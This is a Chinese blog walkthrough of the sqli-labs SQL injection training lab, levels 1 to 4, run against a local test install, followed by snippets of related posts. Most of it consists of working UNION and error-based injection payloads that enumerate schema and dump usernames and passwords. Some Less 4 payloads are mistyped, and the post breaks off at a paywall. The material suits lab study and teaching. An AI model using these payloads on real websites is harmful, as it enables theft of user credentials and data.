sqli-labs SQL注入靶场通关手册(1-20)

最新推荐文章于 2025-06-21 11:31:57 发布
原创 最新推荐文章于 2025-06-21 11:31:57 发布 · 2k 阅读 · 32 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #oracle #数据库

实验报告:

Less-1到less-10

前面需要准备打开phpstudy

同时需要再网页上打开http://127.0.0.1/sqli-labs-master/

然后再火狐上下载一个插件Hackbar V2

Less-1:

打开less-1点击f12

Less 1

GET-Error based-Single quotes-String(基于错误的 GET 单引号字符型注入)

判断注入类型

首先先注入正常的参数,网页回显正常的信息

http://127.0.0.1/sqli-labs-master/Less-1/?id=1

尝试注入个单引号闭合,网页回显 MySql 报错,说明存在注入漏洞。

?id=1'

接下来加个注释,我们观察到把后端的 SQL 语句后面的内容注释后,网页回显了正确的信息。也就是说我们注入的单引号起到了一个闭合的作用,这是一个字符型注入。

?id=1'--+

获取数据库信息

接下来判断表有几列,使用 ORDER BY 子句进行一个排序,看一下对几列有效。

?id=1' ORDER BY 3--+

测试到第 4 列无回显,说明表中一共有 3 列。

?id=1' ORDER BY 4--+

接下来判断哪些列是我们能用的,首先令 id 参数的查询不到结果,然后使用 UNION 进行组合查询。网页回显了数字 2 和 3,说明第 2 列和第 3 列是我们可用的。

?id=99' UNION SELECT 1,2,3--+

接下来开始爆数据库名,我们选择第 2 个位置作为显示位。database() 函数可以回显当前使用的数据库,我们将对它进行查询。

?id=99' UNION SELECT 1,database(),3 --+

接下来开始爆表名,在 information_schema.table 进行查询,使用 group_concat() 函数合并查询结果。

?id=99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

?id=99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=0x7365637572697479--+

接下来爆 users 表的字段,在 information_schema.columns 爆出来

?id=99' union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

?id=99' union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema=0x7365637572697479 and table_name=0x7573657273--+

获取目标信息

接下来我们爆出 users 表中的信息,这个表有用户名和密码这种敏感信息。

?id=99' UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

?id=99' UNION SELECT 1,group_concat(concat_ws(0x3a,username,password)),3 FROM security.users--+

Less 2 GET-Error based-Intiger based (基于错误的 GET 整型注入)

判断注入类型

首先先注入正常的参数,网页回显正常的信息。

尝试注入个单引号闭合,网页回显 MySql 报错,说明存在注入漏洞。

?id=1'

接下来加个注释,我们观察到把后端的 SQL 语句后面的内容注释后,网页仍然不能回显正确的信息。也就是说我们注入的单引号没有起到闭合的作用,这是一个数字型注入。数字型注入和字符型的区别在于我们不需要用单引号去闭合,其他操作步骤和 Less 1 相同。

?id=1'--+

下面获取数据库信息和目标信息和Less-1一样

Less 3

GET-Error based-Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)

判断注入类型

首先先注入正常的参数,网页回显正常的信息。

http://127.0.0.1/sqli-labs-master/Less-3/?id=1

尝试注入个单引号闭合,网页回显 MySql 报错,说明存在注入漏洞。

?id=1'

根据报错信息我们需要一个括号来闭合,注释掉后面的 SQL 语句后其他操作步骤和 Less 1 相同。

?id=1')--+

获取数据库信息

判断表有几行?

?id=1') ORDER BY 3--+

测试到第 4 列无回显,说明表中一共有 3 列。

?id=1') ORDER BY 4--+

判断哪些列是我们能用的,令 id 参数的查询不到结果,然后使用 UNION 进行组合查询。网页回显了数字 2 和 3,说明第 2 列和第 3 列是我们可用的。

?id=99') UNION SELECT 1,2,3--+

爆数据库名,我们选择第 2 个位置作为显示位。

?id=99') UNION SELECT 1,database(),3 --+
爆表名:

?id=99') UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

?id=99') UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=0x7365637572697479--+

爆 users 表的字段:

?id=99') union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

?id=99') union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema=0x7365637572697479 and table_name=0x7573657273--+

获取目标信息

爆出 users 表中的信息。

?id=99') UNION SELECT 1,group_concat(concat_ws(':',username,password)),3 FROM security.users--+

?id=99') UNION SELECT 1,group_concat(concat_ws(0x3a,username,password)),3 FROM security.users--+

Less 4

GET-Error based-Double Quotes-String(基于错误的 GET 双引号字符型注入)

判断注入类型

首先先注入正常的参数,网页回显正常的信息。

http://127.0.0.1/sqli-labs-master/Less-4/?id=1

尝试注入个单引号闭合,网页回显正确的信息。

?id=1'

尝试注入个双引号闭合,MySql 报错,说明存在注入漏洞。

?id=1"

根据报错信息我们需要使用双引号和括号来闭合,注释掉后面的 SQL 语句后其他操作步骤和 Less 1 相同。

?id=1")--+

获取数据库信息

判断表有几列?

?id=1'') ORDER BY 3--+

测试到第 4 列无回显,说明表中一共有 3 列。

?id=1'') ORDER BY 4--+

判断哪些列是我们能用的,令 id 参数的查询不到结果,然后使用 UNION 进行组合查询。网页回显了数字 2 和 3,说明第 2 列和第 3 列是我们可用的。

?id=99'') UNION SELECT 1,2,3--+

爆数据库名,我们选择第 2 个位置作为显示位。

?id=99'') UNION SELECT 1,database(),3 --+
爆表名:

?id=99'') UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

?id=99'') UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=0x7365637572697479--+

爆 users 表的字段:

?id=99'') union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='security' and table_name='users'--+

?id=99'v) union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema<

最低0.47元/天 解锁文章

200万优质内容无限畅学
许阳123
关注
sqli-labs靶场(1-20)通关手册
m0_58168821的博客
07-03 1064
id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+ --------爆出字段名。发现报错如上图,此时我们判断出,闭合方式中含有单引号,我们假设只有单引号,加上or 1=1 --+
sqli-labs SQL注入靶场通关手册1-21
2301_76594872的博客
07-02 1169
前面需要准备打开phpstudy我这里是老版:phpstudy若3306端口被占用,win+r,cmd,命令行提示符里输入netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程同时需要再网页上打开跳转到如下界面:配置成功。
sqli-labs靶场通关攻略(1-20)
kknifek的博客
08-14 1739
sql手工注入
SQL注入:别再纸上谈兵(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Javachichi的博客
06-21 1015
SQL注入,安全圈里谁敢说没听过?CTF比赛的常客,渗透测试的噩梦,说是Web安全的入门级Boss,绝对不为过。想在网络安全界混,不懂SQL注入?趁早回家种地吧!今天就来聊聊SQLi-Labs,一个让无数安全小白闻风丧胆,又让无数安全大神乐此不疲的SQL注入“修炼圣地”。
sqlilabs靶场120题学习笔记(思路+解析+方法)
2301_79355407的博客
04-16 3010
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
SQL注入手册
浅笑996的博客
09-17 330
英文版:链接: https://sqlwiki.netspi.com/ 中文版:链接: https://pan.baidu.com/s/1WWmjvYYnLC6_nItMVvUVig 密码: e98r qianxiao996欢迎您
sqli注入通关手册
m0_59098212的博客
06-10 653
初级SQL注入
sqli-labs SQL注入靶场通关手册
2302_78345978的博客
05-18 1842
在name=后加上'and (length(database())=8)--+发送到重映器,进行修改:首先在User-Agent后加 ’ 查看报错信息。因为cookie需要登录才能验证,所以放行,后刷新页面,抓取cookie。进行HTTP User-Agent 注入,选择less-18。进行post传参无回显的布尔类型盲注,选择less-15。(输入账号密码,提交后,在burp上查看截获的数据)先猜数据库名字长度,>=8时不报错,>=9时报错。进行post传参的字符型注入,选择less-13。
sqli-labs注入完全手册sqli-labs全关卡通关详解与技巧总结
02-24
本书《sqli-labs注入完全手册sqli-labs全关卡通关详解与技巧总结》提供了对该平台全面而深入的介绍,针对每一个关卡,书中不仅详细解释了注入的原理,还提供了多种解决方案和技巧总结,是学习SQL注入技术不可或缺...
sqli-labs 1-22 通关手册
XiaoYu_xixi的博客
05-18 1950
sqli-labs是一个印度程序员写的一个关于SQL注入靶场,一共有65个关卡,其中关卡的类型有但不限于。此处和 Less-18 一样,只是,这里的uagent 换成了 HTTP_REFERER所以同样存在注入,Less-2 是数字型注入(intiger),Less-1 是字符型注入(string)联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过。输入 11' 时没有反应, 1" 则报错,可以判断是双引号注入,且有括号。所以闭合需要考虑单引号和括号。
SQL注入专题[防范+攻击]全手册
06-19
SQL注入专题[防范+攻击]全手册SQL注入专题[防范+攻击]全手册SQL注入专题[防范+攻击]全手册SQL注入专题[防范+攻击]全手册
SQL注入专题(防范+攻击)手册
12-07
SQL注入专题(防范+攻击)手册攻击似乎是如火如荼啊...我也来参合一下
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 1332
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sqli-liabs学习SQL注入之旅(第十一关~第二十关)
guanjian_ci的博客
04-22 2905
十一关 可以看到十一关和之前的十关是截然不同,偶尔也得换换口味才有新鲜感嘛!话不多说,开搞! 前言:这里有两个提交框,我们应该从哪里注入呢?这并不是困扰我们的问题。我们在实战中应该多方面测试,两个框都测试一下,那个可以就搞那个咯!多搞点不亏的!咳咳咳。 第一步:判断参数接受的类型。 账号:admin' 密码:1111 页面报错 账号:admin' # 密码:1111 登录成功(说明这一关存在弱口令,但我们要学习的是SQL注入) 账号:admin .
sql注入速查手册(不定期更新)
读万卷书,行万里路。
01-18 676
文章目录1 利用方式1.1 回显数据1.2 Getshell2 闭合方式2.1 常见类型2.2 两侧闭合型2.3 Order by型3 按回显类型3.1 联合注入3.2 报错注入3.3 布尔注入3.4 时间盲注4 WAF绕过实战附录 1 利用方式 1.1 回显数据 系统信息收集:常见的使用 * 进行标注 system_user() 系统用户名 user() MYSQL用户名 current_user() 当前用户名 session_user() 连接数据库
SQL注入--靶场练习
wmr123456001的博客
02-11 2281
SQL注入靶场练习
sqli-labs靶场1-22关)
weixin_51566481的博客
08-16 8092
sqli-labs,sql注入,burpsuit
sqli-labs靶场通关技巧(1-20
ldzhhh的博客
07-26 3110
Less1 注入步骤: 在参数后面加上单引号,数据库报错,说明存在注入 id=1' and 1=1--+,返回正常 id=1' and 1=2--+,返回数据为空,说明这是个基于单引号的字符型注入 用二分法逐步判断字段数,此处有3个字段:id=1' order by 3--+ 确定回显点:id=-1' union select 1,2,3--+(参数1改成数据库不存在的值,如0或者负数) 暴库payload: id=-1' union select 1,2,dat.
sqli-labs-master靶场通关原理
03-22
### sqli-labs-master 靶场通关原理与技巧 #### 1. 判断注入点和闭合方式 SQL 注入的第一步是确认是否存在可利用的注入点以及其语法结构。通过测试不同的输入来观察页面返回的结果,可以推断出 SQL 查询的具体形式...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值